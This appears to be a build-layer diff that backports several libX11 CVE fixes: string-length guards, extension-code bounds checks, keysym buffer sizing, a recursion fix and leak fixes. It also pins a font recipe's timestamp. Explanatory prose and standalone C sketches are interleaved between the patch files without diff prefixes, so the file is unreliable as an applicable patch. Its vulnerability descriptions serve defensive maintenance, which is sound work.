diff --git a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
index 1ea08a6c99..6a91582068 100644
--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -10,8 +10,10 @@ LIC_FILES_CHKSUM = "file://../misc/fonts.dir;md5=82a143d94d6a974aafe97132d2d519a
SRC_URI = "file://misc"
+SOURCE_DATE_EPOCH = "1613559011"
+
PE = "1"
-PR = "r2"
+PR = "r3"
inherit allarch features_check
@@ -27,6 +29,8 @@ RDEPENDS_${PN} += "font-alias"
do_install() {
install -d ${D}/${datadir}/fonts/X11/misc
install -m 0644 ${S}/* ${D}/${datadir}/fonts/X11/misc/
+ # Pick a date/time as otherwise it would be the git checkout/modify time
+ touch -d @1613559011 ${D}/${datadir}/fonts/X11/misc/*
install -d ${D}/${libdir}/X11
ln -sf ${datadir}/fonts/X11/ ${D}/${libdir}/X11/fonts -s
}
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
+From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
+From: Matthieu Herrb <matthieu@herrb.eu>
+Date: Fri, 19 Feb 2021 15:30:39 +0100
+Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
+ the wire
+
+The X protocol uses CARD16 values to represent the length so
+this would overflow.
+
+CVE-2021-31535
+
+Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
+
+https://lists.x.org/archives/xorg-announce/2021-May/003088.html
+
+XLookupColor() and other X library functions lack proper validation
+of the length of their string parameters. If those parameters can be
+controlled by an external application (for instance a color name that
+can be emitted via a terminal control sequence) it can lead to the
+emission of extra X protocol requests to the X server.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
+CVE: CVE-2021-31535
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ src/Font.c | 6 ++++--
+ src/FontInfo.c | 3 +++
+ src/FontNames.c | 3 +++
+ src/GetColor.c | 4 ++++
+ src/LoadFont.c | 4 ++++
+ src/LookupCol.c | 6 ++++--
+ src/ParseCol.c | 5 ++++-
+ src/QuExt.c | 5 +++++
+ src/SetFPath.c | 8 +++++++-
+ src/SetHints.c | 7 +++++++
+ src/StNColor.c | 3 +++
+ src/StName.c | 7 ++++++-
+ 12 files changed, 54 insertions(+), 7 deletions(-)
+
+diff --git a/src/Font.c b/src/Font.c
+index 09d2ae91..3f468e4b 100644
+--- a/src/Font.c
++++ b/src/Font.c
+@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
+ XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
+ #endif
+
++ if (strlen(name) >= USHRT_MAX)
++ return NULL;
+ if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
+ return font_result;
+ LockDisplay(dpy);
+@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
+
+ if (!name)
+ return 0;
+- l = strlen(name);
+- if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
++ l = (int) strlen(name);
++ if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
+ return 0;
+ charset = NULL;
+ /* next three lines stolen from _XkbGetCharset() */
+diff --git a/src/FontInfo.c b/src/FontInfo.c
+index f870e431..51b48e29 100644
+--- a/src/FontInfo.c
++++ b/src/FontInfo.c
+@@ -58,6 +58,9 @@ XFontStruct **info) /* RETURN */
+ register xListFontsReq *req;
+ int j;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFontsWithInfo, req);
+ req->maxNames = maxNames;
+diff --git a/src/FontNames.c b/src/FontNames.c
+index b78792d6..4dac4916 100644
+--- a/src/FontNames.c
++++ b/src/FontNames.c
+@@ -51,6 +51,9 @@ int *actualCount) /* RETURN */
+ register xListFontsReq *req;
+ unsigned long rlen = 0;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFonts, req);
+ req->maxNames = maxNames;
+diff --git a/src/GetColor.c b/src/GetColor.c
+index cd0eb9f6..512ac308 100644
+--- a/src/GetColor.c
++++ b/src/GetColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
+ XcmsColor cmsColor_exact;
+ Status ret;
+
++ if (strlen(colorname) >= USHRT_MAX)
++ return (0);
++
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+diff --git a/src/LoadFont.c b/src/LoadFont.c
+index f547976b..85735249 100644
+--- a/src/LoadFont.c
++++ b/src/LoadFont.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include "Xlibint.h"
+
+ Font
+@@ -38,6 +39,9 @@ XLoadFont (
+ Font fid;
+ register xOpenFontReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return (0);
++
+ if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
+ return fid;
+
+diff --git a/src/LookupCol.c b/src/LookupCol.c
+index f7f969f5..cd9b1368 100644
+--- a/src/LookupCol.c
++++ b/src/LookupCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,9 @@ XLookupColor (
+ XcmsCCC ccc;
+ XcmsColor cmsColor_exact;
+
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+@@ -77,8 +81,6 @@ XLookupColor (
+ * Xcms and i18n methods failed, so lets pass it to the server
+ * for parsing.
+ */
+-
+- n = strlen (spec);
+ LockDisplay(dpy);
+ GetReq (LookupColor, req);
+ req->cmap = cmap;
+diff --git a/src/ParseCol.c b/src/ParseCol.c
+index e997b1b8..180132dd 100644
+--- a/src/ParseCol.c
++++ b/src/ParseCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,7 +47,9 @@ XParseColor (
+ XcmsColor cmsColor;
+
+ if (!spec) return(0);
+- n = strlen (spec);
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return(0);
+ if (*spec == '#') {
+ /*
+ * RGB
+diff --git a/src/QuExt.c b/src/QuExt.c
+index 4e230e77..d38a1572 100644
+--- a/src/QuExt.c
++++ b/src/QuExt.c
+@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
++#include <stdbool.h>
+ #include "Xlibint.h"
+
+ Bool
+@@ -40,6 +42,9 @@ XQueryExtension(
+ xQueryExtensionReply rep;
+ register xQueryExtensionReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return false;
++
+ LockDisplay(dpy);
+ GetReq(QueryExtension, req);
+ req->nbytes = name ? strlen(name) : 0;
+diff --git a/src/SetFPath.c b/src/SetFPath.c
+index 60aaef01..3d8c50cb 100644
+--- a/src/SetFPath.c
++++ b/src/SetFPath.c
+@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
+
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
++#include <limits.h>
+ #endif
+ #include "Xlibint.h"
+
+@@ -48,7 +49,12 @@ XSetFontPath (
+ GetReq (SetFontPath, req);
+ req->nFonts = ndirs;
+ for (i = 0; i < ndirs; i++) {
+- n += safestrlen (directories[i]) + 1;
++ n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
++ if (n >= USHRT_MAX) {
++ UnlockDisplay(dpy);
++ SyncHandle();
++ return 0;
++ }
+ }
+ nbytes = (n + 3) & ~3;
+ req->length += nbytes >> 2;
+diff --git a/src/SetHints.c b/src/SetHints.c
+index bc46498a..f3d727ec 100644
+--- a/src/SetHints.c
++++ b/src/SetHints.c
+@@ -49,6 +49,7 @@ SOFTWARE.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include "Xatomtype.h"
+@@ -214,6 +215,8 @@ XSetCommand (
+ register char *buf, *bp;
+ for (i = 0, nbytes = 0; i < argc; i++) {
+ nbytes += safestrlen(argv[i]) + 1;
++ if (nbytes >= USHRT_MAX)
++ return 1;
+ }
+ if ((bp = buf = Xmalloc(nbytes))) {
+ /* copy arguments into single buffer */
+@@ -256,6 +259,8 @@ XSetStandardProperties (
+
+ if (name != NULL) XStoreName (dpy, w, name);
+
++ if (safestrlen(icon_string) >= USHRT_MAX)
++ return 1;
+ if (icon_string != NULL) {
+ XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace,
+@@ -298,6 +303,8 @@ XSetClassHint(
+
+ len_nm = safestrlen(classhint->res_name);
+ len_cl = safestrlen(classhint->res_class);
++ if (len_nm + len_cl >= USHRT_MAX)
++ return 1;
+ if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
+ if (len_nm) {
+ strcpy(s, classhint->res_name);
+diff --git a/src/StNColor.c b/src/StNColor.c
+index 8b821c3e..ba021958 100644
+--- a/src/StNColor.c
++++ b/src/StNColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,8 @@ int flags) /* DoRed, DoGreen, DoBlue */
+ XcmsColor cmsColor_exact;
+ XColor scr_def;
+
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms approach to Parse Color
+diff --git a/src/StName.c b/src/StName.c
+index b4048bff..5a632d0c 100644
+--- a/src/StName.c
++++ b/src/StName.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xatom.h>
+
+@@ -36,7 +37,9 @@ XStoreName (
+ Window w,
+ _Xconst char *name)
+ {
+- return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
++ return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /* */
+ 8, PropModeReplace, (_Xconst unsigned char *)name,
+ name ? strlen(name) : 0);
+ }
+@@ -47,6 +50,8 @@ XSetIconName (
+ Window w,
+ _Xconst char *icon_name)
+ {
++ if (strlen(icon_name) >= USHRT_MAX)
++ return 0;
+ return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace, (_Xconst unsigned char *)icon_name,
+ icon_name ? strlen(icon_name) : 0);
+--
+2.32.0
+
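All of the hunks above add the same guard: X requests encode string lengths as CARD16, so any string of length USHRT_MAX or more must be rejected before the request is built, otherwise the length wraps and extra protocol data ends up on the wire. A standalone sketch of the pattern (send_name_request() is a stand-in for the real Xlib request encoding):

    #include <limits.h>
    #include <stdio.h>
    #include <string.h>

    /* Stand-in for the real request encoder. */
    static int send_name_request(const char *name, unsigned short len)
    {
        printf("sending %u name bytes\n", (unsigned) len);
        return 1;
    }

    static int store_name(const char *name)
    {
        if (!name || strlen(name) >= USHRT_MAX)
            return 0;   /* longer than a CARD16 length field can describe */
        return send_name_request(name, (unsigned short) strlen(name));
    }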
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
+From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 2 Nov 2022 17:04:15 +0530
+Subject: [PATCH] CVE-2022-3554
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
+CVE: CVE-2022-3554
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+fix a memory leak in XRegisterIMInstantiateCallback
+
+Analysis:
+
+ _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
+ the internal function pointers, but the internal close function does
+ not free the pointer to the XIM (this would be done in XCloseIM()).
+
+Report/patch:
+
+ Date: Mon, 03 Oct 2022 18:47:32 +0800
+ From: Po Lu <luangruo@yahoo.com>
+ To: xorg-devel@lists.x.org
+ Subject: Re: Yet another leak in Xlib
+
+ For reference, here's how I'm calling XRegisterIMInstantiateCallback:
+
+ XSetLocaleModifiers ("");
+ XRegisterIMInstantiateCallback (compositor.display,
+ XrmGetDatabase (compositor.display),
+ (char *) compositor.resource_name,
+ (char *) compositor.app_name,
+ IMInstantiateCallback, NULL);
+ and XMODIFIERS is:
+
+ @im=ibus
+
+Signed-off-by: Thomas E. Dickey <dickey@invisible-island.net>
+---
+ modules/im/ximcp/imInsClbk.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
+index 961aaba..0a8a874 100644
+--- a/modules/im/ximcp/imInsClbk.c
++++ b/modules/im/ximcp/imInsClbk.c
+@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
+ if( xim ) {
+ lock = True;
+ xim->methods->close( (XIM)xim );
++ /* XIMs must be freed manually after being opened; close just
++ does the protocol to deinitialize the IM. */
++ XFree( xim );
+ lock = False;
+ icb->call = True;
+ callback( display, client_data, NULL );
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
+From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
+From: Hodong <hodong@yozmos.com>
+Date: Thu, 20 Jan 2022 00:57:41 +0900
+Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
+
+Even when XCloseDisplay() was called, some memory was leaked.
+
+XCloseDisplay() calls _XFreeDisplayStructure(), which calls
+_XFreeX11XCBStructure().
+
+However, _XFreeX11XCBStructure() did not destroy the condition variables,
+resulting in the leaking of some 40 bytes.
+
+Signed-off-by: Hodong <hodong@yozmos.com>
+
+Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
+CVE:CVE-2022-3555
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/xcb_disp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/xcb_disp.c b/src/xcb_disp.c
+index 70a602f4..e9becee3 100644
+--- a/src/xcb_disp.c
++++ b/src/xcb_disp.c
+@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
+ dpy->xcb->pending_requests = tmp->next;
+ free(tmp);
+ }
++ xcondition_clear(dpy->xcb->event_notify);
++ xcondition_clear(dpy->xcb->reply_notify);
+ xcondition_free(dpy->xcb->event_notify);
+ xcondition_free(dpy->xcb->reply_notify);
+ Xfree(dpy->xcb);
+--
+2.18.2
+
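The two added calls matter because xcondition_free() only releases the wrapper object; the condition variable itself has to be torn down first (the assumption here is that xcondition_clear() maps to pthread_cond_destroy() on POSIX builds). The same destroy-then-free ordering with plain pthreads:

    #include <pthread.h>
    #include <stdlib.h>

    struct notifier {
        pthread_cond_t cond;
    };

    static struct notifier *notifier_new(void)
    {
        struct notifier *n = calloc(1, sizeof(*n));
        if (n)
            pthread_cond_init(&n->cond, NULL);
        return n;
    }

    static void notifier_free(struct notifier *n)
    {
        pthread_cond_destroy(&n->cond);   /* release the cond's internal state */
        free(n);                          /* then release the storage itself */
    }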
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
new file mode 100644
index 0000000000..c724cf8fdd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
+From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sat, 10 Jun 2023 16:30:07 -0700
+Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
+ error codes
+
+Fixes CVE-2023-3138: X servers could return values from XQueryExtension
+that would cause Xlib to write entries out-of-bounds of the arrays to
+store them, though this would only overwrite other parts of the Display
+struct, not outside the bounds allocated for that structure.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+CVE: CVE-2023-3138
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
+Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
+---
+ src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 42 insertions(+)
+
+diff --git a/src/InitExt.c b/src/InitExt.c
+index 4de46f15..afc00a6b 100644
+--- a/src/InitExt.c
++++ b/src/InitExt.c
+@@ -33,6 +33,18 @@ from The Open Group.
+ #include <X11/Xos.h>
+ #include <stdio.h>
+
++/* The X11 protocol spec reserves events 64 through 127 for extensions */
++#ifndef LastExtensionEvent
++#define LastExtensionEvent 127
++#endif
++
++/* The X11 protocol spec reserves requests 128 through 255 for extensions */
++#ifndef LastExtensionRequest
++#define FirstExtensionRequest 128
++#define LastExtensionRequest 255
++#endif
++
++
+ /*
+ * This routine is used to link a extension in so it will be called
+ * at appropriate times.
+@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
+ WireToEventType proc) /* routine to call when converting event */
+ {
+ register WireToEventType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (WireToEventType)_XUnknownWireEvent;
++ }
+ if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->event_vec[event_number];
+@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
+ )
+ {
+ WireToEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (WireToEventCookieType)_XUnknownWireEventCookie;
++ }
+ if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_vec[extension & 0x7F];
+@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
+ )
+ {
+ CopyEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (CopyEventCookieType)_XUnknownCopyEventCookie;
++ }
+ if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
+@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
+ EventToWireType proc) /* routine to call when converting event */
+ {
+ register EventToWireType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (EventToWireType)_XUnknownNativeEvent;
++ }
+ if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->wire_vec[event_number];
+@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
+ WireToErrorType proc) /* routine to call when converting error */
+ {
+ register WireToErrorType oldproc = NULL;
++ if (error_number < 0 ||
++ error_number > LastExtensionError) {
++ fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
++ error_number);
++ return (WireToErrorType)_XDefaultWireError;
++ }
+ if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
+ LockDisplay (dpy);
+ if (!dpy->error_vec) {
+--
+GitLab
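The fix validates the event, error and request codes an X server hands back before they are used to index the per-display dispatch tables; out-of-range values are logged and a safe fallback handler is returned instead. A minimal sketch of that range check (hypothetical table and fallback, mirroring the 64..127 extension event window):

    #include <stdio.h>

    #define LAST_EXTENSION_EVENT 127      /* events 64..127 belong to extensions */

    typedef void (*handler_fn)(void);

    static handler_fn event_vec[LAST_EXTENSION_EVENT + 1];

    static void unknown_event(void) { }

    static handler_fn set_event_handler(int event_number, handler_fn proc)
    {
        if (event_number < 0 || event_number > LAST_EXTENSION_EVENT) {
            fprintf(stderr, "ignoring invalid extension event %d\n", event_number);
            return unknown_event;          /* never index outside the table */
        }
        handler_fn old = event_vec[event_number];
        event_vec[event_number] = proc ? proc : unknown_event;
        return old;
    }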
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
new file mode 100644
index 0000000000..dbdf096fc8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
+From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sun, 17 Sep 2023 14:19:40 -0700
+Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
+ _XkbReadKeySyms()
+
+Make sure we allocate enough memory in the first place, and
+also handle error returns from _XkbReadBufferCopyKeySyms() when
+it detects out-of-bounds issues.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
+CVE: CVE-2023-43785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xkb/XKBGetMap.c | 14 +++++++++-----
+ 1 file changed, 9 insertions(+), 5 deletions(-)
+
+diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
+index 2891d21e..31199e4a 100644
+--- a/src/xkb/XKBGetMap.c
++++ b/src/xkb/XKBGetMap.c
+@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ if (offset + newMap->nSyms >= map->size_syms) {
+ register int sz;
+
+- sz = map->size_syms + 128;
++ sz = offset + newMap->nSyms;
++ sz = ((sz + (unsigned) 128) / 128) * 128;
+ _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
+ if (map->syms == NULL) {
+ map->size_syms = 0;
+@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ map->size_syms = sz;
+ }
+ if (newMap->nSyms > 0) {
+- _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
+- newMap->nSyms);
++ if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
++ newMap->nSyms) == 0)
++ return BadLength;
+ offset += newMap->nSyms;
+ }
+ else {
+@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
+ if (newSyms == NULL)
+ return BadAlloc;
+- if (newMap->nSyms > 0)
+- _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
++ if (newMap->nSyms > 0) {
++ if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
++ return BadLength;
++ }
+ else
+ newSyms[0] = NoSymbol;
+ oldMap->kt_index[0] = newMap->ktIndex[0];
+--
+2.39.3
+
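The sizing change is the important part: instead of growing the keysym array by a fixed 128 entries (which can still be smaller than what the reply needs), the new code grows it to at least offset + nSyms, rounded up to a 128-entry boundary. A sketch of that arithmetic:

    /* Compute the new array size the way the patch does: at least
     * offset + nsyms, rounded up to a multiple of 128 entries. */
    static unsigned int keysym_array_size(unsigned int offset, unsigned int nsyms)
    {
        unsigned int needed = offset + nsyms;
        return ((needed + 128u) / 128u) * 128u;
    }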
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
new file mode 100644
index 0000000000..31a99eb4ac
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
+From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:54:30 -0700
+Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
+ recursion in PutSubImage()
+
+When splitting a single line of pixels into chunks to send to the
+X server, be sure to take into account the number of bits per pixel,
+so we don't just loop forever trying to send more pixels than fit in
+the given request size and not breaking them down into a small enough
+chunk to fit.
+
+Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index 857ee916..a6db7b42 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -914,8 +914,9 @@ PutSubImage (
+ req_width, req_height - SubImageHeight,
+ dest_bits_per_pixel, dest_scanline_pad);
+ } else {
+- int SubImageWidth = (((Available << 3) / dest_scanline_pad)
+- * dest_scanline_pad) - left_pad;
++ int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
++ * dest_scanline_pad) - left_pad)
++ / dest_bits_per_pixel;
+
+ PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
+ (unsigned int) SubImageWidth, 1,
+--
+2.39.3
+
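The recursion terminates only if each split actually shrinks the request, and that requires converting the available space from bits back to whole pixels. A sketch of the corrected width computation (hypothetical parameter names, mirroring the expression in the hunk above):

    /* Width, in pixels, of the widest sub-image that fits in the
     * remaining request space. */
    static int sub_image_width(int available_bytes, int scanline_pad,
                               int left_pad, int bits_per_pixel)
    {
        int bits = ((available_bytes << 3) / scanline_pad) * scanline_pad;
        return (bits - left_pad) / bits_per_pixel;
    }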
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
new file mode 100644
index 0000000000..4800bedf41
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
+From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:55:04 -0700
+Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
+ allowed by protocol
+
+The PutImage request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), same as the maximum dimensions of an X11
+Drawable, which the image is being copied to.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
